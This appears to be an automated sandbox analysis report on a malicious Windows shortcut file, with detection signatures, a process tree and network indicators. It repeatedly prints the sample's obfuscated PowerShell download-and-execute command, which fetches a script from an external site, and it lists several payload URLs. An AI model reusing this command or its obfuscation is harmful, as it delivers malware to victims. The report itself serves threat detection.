Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0bNBLjPn56.lnk

Overview

General Information

Sample name:0bNBLjPn56.lnk
renamed because original name is a hash value
Original sample name:18606c684a9f169298350be1dc11f222d27c68789953f78d0feedfea90d07c53.lnk
Analysis ID:1578187
MD5:898a7ff6f3cc5cc4f216687d30dac587
SHA1:9f47ae1aae02b3b1a8b4481b755027f78db2d68f
SHA256:18606c684a9f169298350be1dc11f222d27c68789953f78d0feedfea90d07c53
Tags:185-236-228-9287-120-112-91lnkwww-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2744 cmdline: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 7932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 8136 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 3136 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1760,i,5841402874270245853,5687332266173655936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 5648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2744JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_2744.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potential PowerShell Command Line Obfuscation
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), ProcessId: 2744, ProcessName: powershell.exe
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", ProcessId: 7552, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2744, TargetFilename: C:\Users\Public\iys.vbs
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2744, TargetFilename: C:\Users\Public\iys.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing')), ProcessId: 2744, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5648, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 0bNBLjPn56.lnkAvira: detected
      Multi AV Scanner detection for submitted file
      Source: 0bNBLjPn56.lnkVirustotal: Detection: 25%Perma Link
      Source: 0bNBLjPn56.lnkReversingLabs: Detection: 28%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
      Machine Learning detection for sample
      Source: 0bNBLjPn56.lnkJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49738 version: TLS 1.2
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269740507.0000027DEE1D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2269229094.0000027DEDF4F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbe35 source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2353829592.0000026B1BAD5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbP%tn source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEDFEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbbP source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb# source: powershell.exe, 00000002.00000002.2451470735.0000026B35E4E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbment.Automation.pdbn# source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewASN Name: RAMNODEUS RAMNODEUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET /ms/neaters.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.al-rasikh.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/neaters.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.al-rasikh.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.al-rasikh.com
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 10:56:22 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://al-rasikh.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: svchost.exe, 0000000B.00000002.3460852336.000001EA0D400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5EB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.al-rasikh.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.vbsX
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.10.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 0000000B.00000003.2347057711.000001EA0D2C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com/ms/nea
      Source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp, 0bNBLjPn56.lnkString found in binary or memory: https://www.al-rasikh.com/ms/neaters.txt
      Source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2386989031.0000026B1BC60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BADE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2387303760.0000026B1BCD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2449512152.0000026B35B4E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2451470735.0000026B35E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com/ms/neaters.txt-UseBasicParsing
      Source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com/ms/neaters.txt4p
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.al-rasikh.com/ms/neaters.txtP
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf8
      Source: powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49738 version: TLS 1.2

      System Summary

      barindex
      Windows shortcut file (LNK) contains suspicious command line arguments
